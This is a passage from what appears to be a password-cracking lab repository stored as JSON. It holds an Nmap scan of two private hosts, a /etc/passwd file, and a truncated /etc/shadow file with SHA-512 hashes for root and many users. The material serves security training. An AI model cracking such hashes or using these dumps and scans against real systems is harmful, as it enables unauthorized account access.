ZwpjP1YvgkjooQ8GRbZpR4fAo0zevFiGWONgHjDkLKYxDiYIST/:1059:1059::/home/gary:/bin/sh\nbrett:$6$qd2dCjHj$6qWUTOIG5OmP5OcN3.cMfDr24ScByDakPNIrRZjZqcqaiHlBuFbGvDsGTIAPizkZGrIvuH7gnhAgt/hg3f9Gz/:1060:1060::/home/brett:/bin/sh\nSecurity:$6$GPayTWXW$sSarI38ETnIzRUSXgEXambmN8FNcCuUiDqnMYeeKYzavwk0Pefw5VafzCG9jpgTnzaWrY1QlbpkNOy4c22yRu.:1061:1061::/home/Security:/bin/sh\ntorvalds:$6$UdO6LNso$sIErGAh.8NWiPZyarP4EqM15zKLy8ZDT4C1HixADAOHJ8MojNHFAJa33jx9qpixPiUpgibhKJpKb4gY/YgjSx1:1062:1062::/home/torvalds:/bin/sh\nnate:$6$cic0vUV.$/zZv9r8/5C8D7HkGlymqTr1t248kTvSScQfyxnYldFQPQplIbfrn2R61ZHu.t0ImjP38YyMzw1Wbftpg8p9Xf0:1063:1063::/home/nate:/bin/sh\nlarry:$6$C1wU6KtA$XgPBkqQLm6j2QdkDfLNyyQC90Fck6.EKAKxwD0DVeHm2m8k3.r4yLB0.lqa741PXTOYpq.gZPt83GsQszfK0G1:1064:1064::/home/larry:/bin/sh\nadrian:$6$.wQ4ogUx$xRH9xkYVsVAKswluFPaNZj0c/CxVyzpdBkQaZ1rpSU8IEzub91YTwTDrEJUvWnCL9K.Sfm81/lQhLY1VpbX8g1:1065:1065::/home/adrian:/bin/sh\ntest:$6$IKTyMZxA$C6g0kSQ7eWmmRQrB7jlFMvS4oPU48tE18sJKuPxX0QSl9QlOXwwY3U.2aTpalC3i6qcPbLSbjav0SjmlxplNp0:1066:1066::/home/test:/bin/sh\ntech:$6$OTt3okCG$lrKSF4KyxVZgWlJ3uGgBRmMkChdZ8hxHyPWXS2/a2Vlq129Zq3jCZVINrW9nRG20TNsqI0MN07e88jJTGVGjd1:1067:1067::/home/tech:/bin/sh\nsomeone:$6$Zk8ylIKZ$rFllR3qlbmirrkgwRppG0HaV9ppHK0/jHWTVeqsX3oxFKjnzgg.DnS7CMXas151xCk51CmUV4dmeL17cJ3nIZ0:1068:1068::/home/someone:/bin/sh\nkris:$6$MIsyuc0b$PcN7IMMSL7Fjla0C7IayevAuLD6iQmkvGX2rIxcx0VAGr7LACwtchRrE3AcZO5yTr3MQlZac9q2tvJcQjAUiF0:1069:1069::/home/kris:/bin/sh\nandreas:$6$rsAbNhaA$CAbbNGghKugILQ6glWV0tEzeVbhoMB3S92Y155EHMaGeZsi6TpCIDVjw8aWlmWGIQAdB28OLQMKgWbYEAEz8x1:1070:1070::/home/andreas:/bin/sh\nakpm:$6$00w49s/D$wpRXPoKKRN4rNp11hIPCJ0v/C6BPpI.GZeihVlSfpvVd0s0zqglwb.blyf.hLsgrIbKwDI1s0Yvk6.FmArahS/:1071:1071::/home/akpm:/bin/sh\nstephen:$6$ssSU27er$LdCIfDEwxxrPHZLILJoBz3Zg.wWEaVgUfxf7pd8TQXtF4d1nOtIkUav2TMY1xrbyhCutzShgIkQTeopPCwlRg/:1072:1072::/home/stephen:/bin/sh\npassword:$6$hy0ECcK6$FdtsdPMLymN9GYJFaWsCq16yyMY05Whd41qODKrWpSmwR1QiiOPcUtLutMJtpWkDv/AqUivlU2NChCrUZMini0:1073:1073::/home/password:/bin/sh\noliver:$6$Iv.78Pvl$x4i0h9HyFfRo5mLan7JhSIS.5Yn7W5shQQpqHMC5ToXdUTWrUYDjgIZ1DtwTU4YRUh9O6QeR84k.i.4NSfX.51:1074:1074::/home/oliver:/bin/sh\nblaisorblade:$6$fI69BmWc$wrckcetwa5aKTbP0QZU7mJ3QD2yATRzag31BaCYUE0c/ESYNf1ivKrD/VsDY3D/PuIs1pup.VYm8OkwDnrUd6.:1075:1075::/home/blaisorblade:/bin/sh\nroman:$6$pyat9UWx$t1ZZZGJ56DMNfl9IIWmT4DNeAQ1/RngqhGS232FytUAEtLn.duPbCoykRkfUiP2XrpV3V8Qh7wejTDsqyrXFq.:1076:1076::/home/roman:/bin/sh\npostfix:$6$rMJQQZvk$EsTIxQbNZAgsETizbhaK/JUX0SAvWdXuVi0lNH1qI3kFy98e08XpH1c2fEOlCIlekhyymCiDVTP03Y/fo46pa.:1077:1077::/home/postfix:/bin/sh\nnathan:$6$t1nr6qNz$GdaeXW3DynadN54N9.XGO3F1VN0kWgxfnE7i/KaPM9Rv2FVEfZaJDNMqqrcrxtHjtxH8dHMIgnIviAlXejZI0.:1078:1078::/home/nathan:/bin/sh\nkarl:$6$2SjYTDHQ$or6fqbKAyWYmzj7yqQov/KWIeti459Y83WCgh3hp11cQdRhzLIyOjUo1tFn/vtZpWDb6Sc94T2CL5MgMcgb0Z/:1079:1079::/home/karl:/bin/sh\njose:$6$q0dfDsFf$md83VAivCKQ0mKAt3iUhX5XyX2.mif0bdDm3qd/uu6pGPlFFdpHXiFiPrU3A5QfnksdVA.yMF2kqqARuBybmH/:1080:1080::/home/jose:/bin/sh\nfeedback:$6$oxHD8GmD$kGMV8tRl31iptNlU3kLM7Z9vrqSTqosZtjHseV.bFuRhrD9ZYUjxgYabUL2CaQYq6kChznrdyg1hk.L9om0eQ1:1081:1081::/home/feedback:/bin/sh\ndev:$6$MDKxgwuE$vnvMEnKF/CwtqC60XEdqQO07UTrIVV0IxNoaMl3uGQy37Gh9Dl5jbg0bbAOBon2Uslmzy28AcyO7xJafdd5iw0:1082:1082::/home/dev:/bin/sh\nbryan:$6$ZFlofYYU$aWT3Ig1t7xYYrkIdZb..EUaYUrwGzLSVaKhy5IJtvFTQAKUi4xf8Ek8IU2KQf6Hj9YJBY7fpuSKW052ct/qmI.:1083:1083::/home/bryan:/bin/sh\nbruce:$6$bKYubhwp$8VamLKD7r3OWbnqn79l3HsuBf5X8YAR2cq6s5.Tparz2GK2dGThKQTchJ3ZHTmCV7VsJdZzqXRHiknQU2gaDf0:1084:1084::/home/bruce:/bin/sh\nqmailr:$6$ewnv7baU$vgPT5H27mTC1LPskTQlmkWug1puAoIeEpWhWY65.PDOIXk09unASmKIpgYCTGIGUpXyg6Y04Sswqo2shldi30/:1085:1085::/home/qmailr:/bin/sh\njamie:$6$hKrwJ2XL$K.VjPjTb0deFuo3YIhvypxHN9Wn952X2rIbhJ.t.5Gk9uO1vqt3NH5HEw2uPwPGMYSpuM4GzfXLEO9PKO2ZM//:1086:1086::/home/jamie:/bin/sh\nderek:$6$VRU46VG/$21FGTv71yuYyQ/7AtIzIqjV3GdHivvx7abiNlqe/QMffvF4NNAGRJ0cDL2eyWM2vPfIZZtcpn8P6XrcqqblYP/:1087:1087::/home/derek:/bin/sh\nbrandon:$6$OsORtNZ.$1Jr.wOnm6EonOFjMu7utgFiv5VT.K2Fbt0JehTIevXHom.if0w3QBWeMvXJ0BZHeA8TleiCkcozae1KOBlbHX.:1088:1088::/home/brandon:/bin/sh\nrisks:$6$SoZjQEuS$Nxo6bfcqQGXW7Sj40Y/7OuG4KgKMzWROATWrJ6EfO9wk0FTqQXMv2Rx6Eml3p7i7s7YM/9S6wwA8hUtcQ9sRY0:1089:1089::/home/risks:/bin/sh\nproberts:$6$ft8ebMmB$pZgSxqCWt9CxaAM7KrD9PTVJRVGFeAsm9mkWavvOYlErmnmYuo/qFYSLZ.jfgbfHEwq//nz67TK4MHRm6NemL0:1090:1090::/home/proberts:/bin/sh\npierre:$6$jhaog97C$XVbyU2iMF0Fj8qMg0.PryFkhVctz50UTCzmtSvgYIJKtEzvfJ5XQ.V5aiGph2IjMOaUhSL1eDO8.sYSQDydGZ/:1091:1091::/home/pierre:/bin/sh\npgo:$6$msJLJFAW$3yLybUn97UyvcxoV77JCoRS9IVcgPb5lMYNPgc2.bQKBrZvT3Qw48GroMnA.VPPdQlGHRKRL70bYDWa8HWJOX1:1092:1092::/home/pgo:/bin/sh\nmaxim:$6$v4qWXFNW$xvrxBZ8gfF7fsbGJ3V94dew9bajgsxI62Ew0jM0GK/EGRVQmT6sNpEbcYzVuSK8U6ziH7R7pqWwC9Uja7eF5X0:1093:1093::/home/maxim:/bin/sh\nguest:$6$6vAGLPss$5Ciwdq3qSTSTfgtrqZ.cY9SI5AtZwHN/MBqIEIhCOJcmXKDik7Je47JvyjeAng01AcfsjEMatE4tzusDIcEwU0:1094:1094::/home/guest:/bin/sh\n" }, { "path": "ine-labs/bruteforce-and-password-cracking/nmap_scan.txt", "content": "# Nmap 7.91 scan initiated Sun Feb 21 14:10:57 2021 as: nmap -sV -iL alive_hosts.txt -oN nmap_scan.txt\nNmap scan report for 192.168.99.22\nHost is up (0.055s latency).\nNot shown: 998 closed ports\nPORT STATE SERVICE VERSION\n22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)\n23/tcp open telnet Linux telnetd\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n\nNmap scan report for 192.168.99.100\nHost is up (0.00018s latency).\nAll 1000 scanned ports on 192.168.99.100 are closed\n\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ .\n# Nmap done at Sun Feb 21 14:11:07 2021 -- 2 IP addresses (2 hosts up) scanned in 9.88 seconds\n" }, { "path": "ine-labs/bruteforce-and-password-cracking/passwd", "content": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\nbin:x:2:2:bin:/bin:/bin/sh\nsys:x:3:3:sys:/dev:/bin/sh\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/bin/sh\nman:x:6:12:man:/var/cache/man:/bin/sh\nlp:x:7:7:lp:/var/spool/lpd:/bin/sh\nmail:x:8:8:mail:/var/mail:/bin/sh\nnews:x:9:9:news:/var/spool/news:/bin/sh\nuucp:x:10:10:uucp:/var/spool/uucp:/bin/sh\nproxy:x:13:13:proxy:/bin:/bin/sh\nwww-data:x:33:33:www-data:/var/www:/bin/sh\nbackup:x:34:34:backup:/var/backups:/bin/sh\nlist:x:38:38:Mailing List Manager:/var/list:/bin/sh\nirc:x:39:39:ircd:/var/run/ircd:/bin/sh\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh\nnobody:x:65534:65534:nobody:/nonexistent:/bin/sh\nlibuuid:x:100:101::/var/lib/libuuid:/bin/sh\nsshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin\nmysql:x:102:104:MySQL Server,,,:/nonexistent:/bin/false\ntelnetd:x:103:106::/nonexistent:/bin/false\nsysadmin:x:1000:1000::/home/sysadmin:/bin/sh\ninfo:x:1001:1001::/home/info:/bin/sh\nsupport:x:1002:1002::/home/support:/bin/sh\nabuse:x:1003:1003::/home/abuse:/bin/sh\nadmin:x:1004:1004::/home/admin:/bin/sh\npostmaster:x:1005:1005::/home/postmaster:/bin/sh\nchris:x:1006:1006::/home/chris:/bin/sh\nwebmaster:x:1007:1007::/home/webmaster:/bin/sh\nmike:x:1008:1008::/home/mike:/bin/sh\nsteve:x:1009:1009::/home/steve:/bin/sh\ndave:x:1010:1010::/home/dave:/bin/sh\npaul:x:1011:1011::/home/paul:/bin/sh\npeter:x:1012:1012::/home/peter:/bin/sh\nmatt:x:1013:1013::/home/matt:/bin/sh\njobs:x:1014:1014::/home/jobs:/bin/sh\njoe:x:1015:1015::/home/joe:/bin/sh\nuser:x:1016:1016::/home/user:/bin/sh\neric:x:1017:1017::/home/eric:/bin/sh\ndan:x:1018:1018::/home/dan:/bin/sh\nbrian:x:1019:1019::/home/brian:/bin/sh\nmichael:x:1020:1020::/home/michael:/bin/sh\nsales:x:1021:1021::/home/sales:/bin/sh\nnanog:x:1022:1022::/home/nanog:/bin/sh\njeff:x:1023:1023::/home/jeff:/bin/sh\nalex:x:1024:1024::/home/alex:/bin/sh\nscott:x:1025:1025::/home/scott:/bin/sh\njason:x:1026:1026::/home/jason:/bin/sh\nbob:x:1027:1027::/home/bob:/bin/sh\njim:x:1028:1028::/home/jim:/bin/sh\nadam:x:1029:1029::/home/adam:/bin/sh\njames:x:1030:1030::/home/james:/bin/sh\ntim:x:1031:1031::/home/tim:/bin/sh\nmajordomo:x:1032:1032::/home/majordomo:/bin/sh\ndaniel:x:1033:1033::/home/daniel:/bin/sh\nben:x:1034:1034::/home/ben:/bin/sh\nhostmaster:x:1035:1035::/home/hostmaster:/bin/sh\ntom:x:1036:1036::/home/tom:/bin/sh\nsnort:x:1037:1037::/home/snort:/bin/sh\nandy:x:1038:1038::/home/andy:/bin/sh\nandrew:x:1039:1039::/home/andrew:/bin/sh\ngreg:x:1040:1040::/home/greg:/bin/sh\nrobert:x:1041:1041::/home/robert:/bin/sh\nmartin:x:1042:1042::/home/martin:/bin/sh\nrob:x:1043:1043::/home/rob:/bin/sh\nstefan:x:1044:1044::/home/stefan:/bin/sh\nsam:x:1045:1045::/home/sam:/bin/sh\nlinux-kernel:x:1046:1046::/home/linux-kernel:/bin/sh\njonathan:x:1047:1047::/home/jonathan:/bin/sh\nerik:x:1048:1048::/home/erik:/bin/sh\norion:x:1049:1049::/home/orion:/bin/sh\ndoug:x:1050:1050::/home/doug:/bin/sh\nspam:x:1051:1051::/home/spam:/bin/sh\nnessus:x:1052:1052::/home/nessus:/bin/sh\nbugs:x:1053:1053::/home/bugs:/bin/sh\nrick:x:1054:1054::/home/rick:/bin/sh\njosh:x:1055:1055::/home/josh:/bin/sh\nresearch:x:1056:1056::/home/research:/bin/sh\ncraig:x:1057:1057::/home/craig:/bin/sh\nsven:x:1058:1058::/home/sven:/bin/sh\ngary:x:1059:1059::/home/gary:/bin/sh\nbrett:x:1060:1060::/home/brett:/bin/sh\nSecurity:x:1061:1061::/home/Security:/bin/sh\ntorvalds:x:1062:1062::/home/torvalds:/bin/sh\nnate:x:1063:1063::/home/nate:/bin/sh\nlarry:x:1064:1064::/home/larry:/bin/sh\nadrian:x:1065:1065::/home/adrian:/bin/sh\ntest:x:1066:1066::/home/test:/bin/sh\ntech:x:1067:1067::/home/tech:/bin/sh\nsomeone:x:1068:1068::/home/someone:/bin/sh\nkris:x:1069:1069::/home/kris:/bin/sh\nandreas:x:1070:1070::/home/andreas:/bin/sh\nakpm:x:1071:1071::/home/akpm:/bin/sh\nstephen:x:1072:1072::/home/stephen:/bin/sh\npassword:x:1073:1073::/home/password:/bin/sh\noliver:x:1074:1074::/home/oliver:/bin/sh\nblaisorblade:x:1075:1075::/home/blaisorblade:/bin/sh\nroman:x:1076:1076::/home/roman:/bin/sh\npostfix:x:1077:1077::/home/postfix:/bin/sh\nnathan:x:1078:1078::/home/nathan:/bin/sh\nkarl:x:1079:1079::/home/karl:/bin/sh\njose:x:1080:1080::/home/jose:/bin/sh\nfeedback:x:1081:1081::/home/feedback:/bin/sh\ndev:x:1082:1082::/home/dev:/bin/sh\nbryan:x:1083:1083::/home/bryan:/bin/sh\nbruce:x:1084:1084::/home/bruce:/bin/sh\nqmailr:x:1085:1085::/home/qmailr:/bin/sh\njamie:x:1086:1086::/home/jamie:/bin/sh\nderek:x:1087:1087::/home/derek:/bin/sh\nbrandon:x:1088:1088::/home/brandon:/bin/sh\nrisks:x:1089:1089::/home/risks:/bin/sh\nproberts:x:1090:1090::/home/proberts:/bin/sh\npierre:x:1091:1091::/home/pierre:/bin/sh\npgo:x:1092:1092::/home/pgo:/bin/sh\nmaxim:x:1093:1093::/home/maxim:/bin/sh\nguest:x:1094:1094::/home/guest:/bin/sh\n" }, { "path": "ine-labs/bruteforce-and-password-cracking/shadow", "content": "root:$6$NMfSi/bG$y9j8uMu4glpLudMRvzznUZ5h30jlobtAJGZYRaa64pdKy3i1WLTnmPPWUxfPdZwJKReFPU/zBo8HRpD.RAkrG1:16475:0:99999:7:::\ndaemon:*:16315:0:99999:7:::\nbin:*:16315:0:99999:7:::\nsys:*:16315:0:99999:7:::\nsync:*:16315:0:99999:7:::\ngames:*:16315:0:99999:7:::\nman:*:16315:0:99999:7:::\nlp:*:16315:0:99999:7:::\nmail:$6$jLhDRY5M$MJPM2mmM1khh8l0taxORP7oNn4jmwHAOLWZij5DacV25Hzj1ryykobxGlprlgaCXg/PGV2Po34JF4HgPv8roQ.:16470:0:99999:7:::\nnews:$6$7pnXYnUf$F7t6t4A6rQf2z/ycnPuEdzMH9RGB5W0OFL420eKvp/s/SK3KaD6EM/gDNzhL9YFCthi7JVavBa8/nJCxX3XZW0:16470:0:99999:7:::\nuucp:*:16315:0:99999:7:::\nproxy:*:16315:0:99999:7:::\nwww-data:*:16315:0:99999:7:::\nbackup:*:16315:0:99999:7:::\nlist:*:16315:0:99999:7:::\nirc:*:16315:0:99999:7:::\ngnats:*:16315:0:99999:7:::\nnobody:$6$KRss6ftU$c/nB9QsK0iZ0zj8o6VmArcgiuGZ4oOjlLeCDYioV/rrcYYtuE/xkvhdDYvRtlydkFjvlqOXdKDV/0o6fA32Qt.:16470:0:99999:7:::\nlibuuid:!:16315:0:99999:7:::\nsshd:*:16315:0:99999:7:::\nmysql:!:16315:0:99999:7:::\ntelnetd:*:16391:0:99999:7:::\nsysadmin:$6$Sje/FZov$s6OBgDRso6O25TAo/K62bmuUjGI7po0yaa5y7n4agBKIFywDyleLs2FFNlXJiAgROHN4VD/WkfEFYIXcH9QPW1:16475:0:99999:7:::\ninfo:$6$b7FyMcC/$Xq.S9rAti5XfKvNR8DK2U0hCusjKeqNBGxrm0W9OvfA29gg68kKRkTyut6rLIf0ib4rLilPg6uiSqCUOuoYFU.:16470:0:99999:7:::\nsupport:$6$5UCqb4PI$080lZhjRESgv4pvv3eYze/PQFkEzIe//QBAgX4383cxPfX4B7hwsPP5d.vEOp49Nep015ISQCkD1SV.b.CeV0.:16470:0:99999:7:::\nabuse:$6$wew6XAFC$bRWpMBzLUx9vps5kW8zBJlHh7y7TodfdNfClkmlTEIcs31q9TQR1nPnGYp4GO4fpcOTs/H8Ui62lFoywXMjSs.:16470:0:99999:7:::\nadmin:$6$u145Czfw$8UNRyCdVRM5BpO6wMZBOhJJA4tXLexxwQJhGLbJbD0FUOBWg.V/ybl6BNQVr4er3Gghg8gymvUqu1fMWqLs3V.:16470:0:99999:7:::\npostmaster:$6$TNSdQqc8$Pij0H4TXEH6.i2tpomznu0uY9UFss/wG6xs1qsYQQSJ0YZNB/dBDkmq9I3O1regCsFgS9r7jSGq0GG7eIcqtK1:16470:0:99999:7:::\nchris:$6$ZAY5sjcZ$htURsPqIyO4tpNUq12v2GDgAXe4oGVLYPQHDpVn7TMgLm8MP7g5hpZo5NitjHQfqvzB0dptX.fR0ciN6kkWeA/:16470:0:99999:7:::\nwebmaster:$6$KLM4wfkU$ZYsO.eQu2qXMfpQaSLzjgJn0dBfyiPRrb4xKT8cUWbaVI.psHzgPuWpkXiwKKWrqfSVCceQBuDVwFNQwH6qWS1:16470:0:99999:7:::\nmike:$6$HZRL7RJz$PanyrCDQAvupUzoQ/SjtY1pp4DHQE4p7sVfvh6oZNbAlgUQBIf9R6TMW3wNV4976ngBUhp.39ZKbPwMYf2vsU1:16470:0:99999:7:::\nsteve:$6$gDpnLZEp$fd9Cptcb9W2lIYMIP/YTgmT4t2syNr99LWNmdemNdhKOpAQ3KnHMR6/BRtwyKJw2ASYWlM612anHKhT7DEua31:16470:0:99999:7:::\ndave:$6$ye9cmjcs$WwHt5jEfmA3ONfKpD8YjLu2bReTpNoDByFdvfYCHD81609nrgkXEq8iV12LundO8a5oUW9h3HN4m0GYLKHM4W.:16470:0:99999:7:::\npaul:$6$dJKby9gL$YOeP.Ct6VQjxDDptfdvsTjgZEuvoIzhKua8lbn9G/BAQZ5zxNMSaeTAvQYF4Tk3MR6VVmAKrEx86LC2pXmJ4o/:16470:0:99999:7:::\npeter:$6$vMrS1QqI$rY7HpdXf1T2YRXcryJf7ubn98vsPD5aNduivE3biK.ExHmO1bjhn3UlW4wX2B9PPUTiNY49N88jZGKXUr/Yu3.:16470:0:99999:7:::\nmatt:$6$WPIf46Nd$/xQQomUKt1rkbWVDMfqJsvPQStDthciv8OwXgPQyTos8Yz3YTlP8WTwWPKyWauiYP6/EiBtAW3LhaBXo3LTXQ.:16470:0:99999:7:::\njobs:$6$fVNXa4IX$9CCRbwgJpfmQTUCTEBb9tqI0ze1vkSbMUUOusWxnH709pyzTCWdRTBtzViTuECSJBwxZhDwwjZdl7f7rtiAYg.:16470:0:99999:7:::\njoe:$6$xD.dth1G$g5u/t/SnuBZCprxXo9CogU5AXcaEtWglhu0nzxZzJTimkobFgI97xCR0p66REWXfWDZ.z95SeWoGPswT0j8wU1:16470:0:99999:7:::\nuser:$6$nytxqfYV$.ysNgYy5wAqynOjSAt8j7wKqDVwMjhhMI/5NQZohVKtwtZjtoSHSgxhT3MkGUvP5O0INCRZihD34Dz0wB2KCQ/:16470:0:99999:7:::\neric:$6$VuEU0lI9$VCX/Tg6mxXY7wHHoCGQmw8syH39n6wrmUVgChfTd6I0Yt7Un7SFukxR0hhC2NHl6T7Fumr8hVwvML5DMF.Ua./:16470:0:99999:7:::\ndan:$6$zVKkCXse$o07lxPMPnWaHQfbj6s/D23pJNzhLsKi1WGGlsVifSIXdYdQ0pCbl0Rjn/JV83HI4f0lDjBGWLv92gSeBdqCzZ/:16470:0:99999:7:::\nbrian:$6$o1kRvK4f$6kx2GgKATEjqgF/Ne5H3EEGBUMz/2zZwVv3kTCr7wnxqN7eKkkBATmz9Ye3C6QW/MQRW.9F6MHSGvJKnA4uFG1:16470:0:99999:7:::\nmichael:$6$1yCWFuPq$OiVnd4GHG/8bMLzLyWVpV47WAf7r9LYzTfGLSKI02.Ubq8YK/QsSi7EuXRM7cPC5IH9HpSkYWJQBbOUZQQHYt.:16470:0:99999:7:::\nsales:$6$PsA1.Gfk$zowvm.gcO7raMNmAJ8fDLjKybTUanVmVNld/k5S7gMrwq43Q1jO2MQ/dGhNQTsCNrC2.Vwjt3/D3JKKNHJbX/.:16470:0:99999:7:::\nnanog:$6$FDvdWcSH$F9T5azU4LovIyNB7wX0htrH74TJ46iHmn3QjI8lgQEKVQDeQ6Kd1skimbuTbE7.L7bl9xO7j/GpdiQp2m4c9d.:16470:0:99999:7:::\njeff:$6$6hWz2ZU6$xcj.w/GvzUWwqmpE5CVAX8pWrW/92yi/13BKzu31oH80P7KJ2kKr8rpRgMkjuIO3GjHdGg1qmYxkvNcwubsMC/:16470:0:99999:7:::\nalex:$6$JyMZO.bE$h0b.97PuMtRnim8GRTiWbqxNIvLeiQ12dBTDyufyaClGhIRHnSaNQVdqFMSDY5f.qpGrk0rTxHQ8Ba8zMdk5I.:16470:0:99999:7:::\nscott:$6$LawsHaww$YJJd3lCsV45nty1gHPUp2PIwC9ezfZ8R7s4X4cq16XeiNg34aD.ydJZxG09Gfbv4HhH.BUeCDe.Zg4KDxvccV/:16470:0:99999:7:::\njason:$6$fvuvc5Jr$Rtbo0pfPs4sgCreQSOKdOy2Xes8ZpGaWpRzau/zT0Fe2PfY895x9FGZUT9OlTJvRH73wuLI1DzkqVq46M8MCo.:16470:0:99999:7:::\nbob:$6$O9g8kRFd$n4qyO7Pn0e0q8.JPhoszE9CT06lheE4PcMaHhB.VXQeWlsAKWoSHaOlI8QDBb0Tx9wKuuyTKsbTE7w6Znw2Uy/:16470:0:99999:7:::\njim:$6$RoQAB6qb$J6ku0OnN9AW/rlGDogQC0a8mHlM5SEpLJTvpRRYr1ozJ.1tpa14MW/txPzxJM0aDehqIskDrPgeu2GNAQriVx1:16470:0:99999:7:::\nadam:$6$SMfCr27F$ZsSxV5bja0friZIyeaVwKhOta1Kde4X8Lk6HrqCWPA1Nm7TpvsoLZh1qHz/tPJSp6l/LzDIn7lOkGBC4HuD6E.:16470:0:99999:7:::\njames:$6$qEJW3BIW$c8Zo6o0MABzuSLQu5Db6wFZAkNliAVC/VM4NHVu5Sd2mUb.xBIUbuvQLWbbXf6KPgtNhuzPdGrey45LtRYVSP1:16470:0:99999:7:::\ntim:$6$JXamlohb$Az7LB/X.bm7J4QU//XHE9W.OGZ87wi2RVRHAWrSYxX75lrZn7vkwSGxBp/pZEZLGUJhnzE86lkIb.VPkst2Ql/:16470:0:99999:7:::\nmajordomo:$6$NPJJ2uUo$ct2R6b.jg.WK4dAw2wzdDgxsuHg5LUpdvz9owz.CgAb6L5o/IKsOZj6rbmaWyolhanoOxKrdsmn4.Bysh0hGo/:16470:0:99999:7:::\ndaniel:$6$8mksQQtb$xXcaS/KPANmdotnWrHa26J4KUaQHBQSxy5FvniWecSyIpvZtZrm9ZMCG/x0WKXzo0NOHwS6yoKYUoRwB4BDwh1:16470:0:99999:7:::\nben:$6$2iH7dNAN$zgpUqA9ZXBRRDkJuv1TrAulRGQplR5t98Gx9js77s6quNEtU/hXZLHKryYZtDZO8MJjO.ZUzs8k9QpKrRBGX51:16470:0:99999:7:::\nhostmaster:$6$V5c3cv9Q$S0JMkvGW7qokXYf0lEGAw8kY29s1VKKcSz16N2fvbJHML5BZR6vZofyTGUMNGVJ1k.RNjHYdmOqdId0Ep0wO61:16470:0:99999:7:::\ntom:$6$JWml6IwT$UbW187dhuYbtw983jO9EqT/m6qYzT/Ovvw9lcIpBsL./g7r6SJTDFsupsnNoavyfQ3FE2tq0tr4byVdsvxxu40:16470:0:99999:7:::\nsnort:$6$O/joFTvS$zFDDPUYVY3qQq45i6FgZRFx9dQdTTkWoIKE2IsoBw5FrzZGoKiLS82FcMCCr0bouOD0cX/hYswDjKD7UNN4v/1:16470:0:99999:7:::\nandy:$6$vvz6/jIM$KpRwLWVb.JQZd9A/gAgmV/jdyXUr0FzU4CwOpzxVI7/7qd9pt6AFdSSMokJWL.WC7w0yFuITvyoE7iSyy4Ed6/:16470:0:99999:7:::\nandrew:$6$xrxK.ZMk$SbnalSKc8SRQUuZadGTGhClUF18xjC4HTWOPlcT2D5wgRkd.ou5zLE7dyM/bBI0M9vc6WYQjQJ7Teotmc3dJN/:16470:0:99999:7:::\ngreg:$6$M6b5jpj3$1toGupgM1bdko05fLUrnUdDwwdB2nbK3pvpgpA.cK6dI8ZyBW0PnHX29mwK6qV4gGUZaGZGpUHCUZHQPXTW87.:16470:0:99999:7:::\nrobert:$6$yfsl9IAe$5ZtjNOyf7uuOo4a.Q7G.96z67KB9BHI.9ri7zeqS6HFk4RjtePvXGdD5iZCK4EJUBsyjy8KYe0NsSEz4S1jZK0:16470:0:99999:7:::\nmartin:$6$UMJrcI1d$ljAGjf2Ysu6WZj6OonyBqdWgC1JGBrg/cSkwA8P0AYuFUi2Nj3V8jTz77HSBCgNdBmi8Z0DpU40lkpJoKCVYi1:16470:0:99999:7:::\nrob:$6$KynzgNNI$CRqz5ZCoxyw8Iz3Y4DavYHefo8e3CdPxaJAKmA8G7fVioFb3imRVsOQO9fvR94aOSywrCHx8JRZ8rox4jqVCk.:16470:0:99999:7:::\nstefan:$6$5UNbMPFr$S9zKaPdjN3WF5XdvcBZrc1RV.bk/ufmZgiNAr8OsnKtZCPqFRtQ.g2ewAbQ40ARubCMQD0fIdQSL3LB4JBBuK1:16470:0:99999:7:::\nsam:$6$4IQ98NuP$Q7Kd1uQhbVl4rv9yPzn51rA8U1stcC9zCUu/o83v959HNcMXdEyZ39Ec8/cTq89v/fes.lwpozekSK16JHLr3/:16470:0:99999:7:::\nlinux-kernel:$6$iZd1ERbp$wO5U7YmvpfM8vuJX2er3jI7JPUTv7ahoypgc2n1/CWQr9yyf7CyFcxUBj9T2tEx7KR9x3Z6/C5Q3wxumJKMuu/:16470:0:99999:7:::\njonathan:$6$JN51qUeO$YRkPN8gR43gmtTEg0uycZaz3SOOwT37g17tt8bB/Fi/Xr/dKPsUhaWfOjZ1uNrJg7sL4z9srGe.zWP0B1tfQc/:16470:0:99999:7:::\nerik:$6$Ib9a2n66$vfEKmQ0LO/sV3M4PsanGWx3ATuHNFZ/FysOYhKAdG4PdXeXiLackGxLuNs7qG4KOAVVhyLAM.99pP4j8sJ3Vr1:16470:0:99999:7:::\norion:$6$EnZP3LwQ$pDR2Jny9KIPDEmoB.jzhp38Ik5FyG4DWzewHoEePxdCBzFfBWnIUQNXDNup8U2IoAiUC/jaO/i9SpStI8ZgIa1:16470:0:99999:7:::\ndoug:$6$kV2vj2S6$eKQyp76DlZbo/tgLKyjtLQf.G86BY9oVkfscbIrWwCYRqd.zJnLIOJPrGJJSvK59O.OpUc5L8vo.1yet/IndA.:16470:0:99999:7:::\nspam:$6$b4.yukui$byGJM8hTw11KmLes6YSfvo7IKfkg5HYtll.JOVFJgM9IObO6NE7dpLhTiHxgLLCPtXa0wbwxPAlYTtPsrCnLP.:16470:0:99999:7:::\nnessus:$6$5b.qaMaF$MSnDGsA6Yo7LzABXWXtdHb5HruaehdkrLbdv9Yg.lQoG9nC6patjwPqFuR1G2CSslqIZkBbZst7rhCeJXr3Z.0:16470:0:99999:7:::\nbugs:$6$cJfe9yB0$DkgkyIHYGOFQ9hIF6A28Da0niQBq6Yn9PXjNKAJEK7y0sdEc6v9KSpW8DEBXg.lO/MCgpHuuAbbcAQfYs36gG/:16470:0:99999:7:::\nrick:$6$SFXj7ADA$qu3mlQDjIwVNzC.3JkUKUS2Hp7aeC1Zg5GP1h7nM5BmCTsJ7d1ckSF3ErjPbpZFIqNCz6NAgy1F76PmjeJz.x0:16470:0:99999:7:::\njosh:$6$KU1UUsAZ$ac7T8xBfcLxXmb/qRNuEKrfZy1G/kcqsJzWJ93/qTa08itf31x5/pcdVHj30MKXYh/poaN8fOlKkZR0f2xrr3.:16470:0:99999:7:::\nresearch:$6$m0nQbAaZ$FKL3XBWkT3GEv0UVn6WTHssjyjou2/33f8BKE4voI7HWU9FdF1hABlyQAqAYhJOfRuQpuZzSBcJVvCMtMX6D51:16470:0:99999:7:::\ncraig:$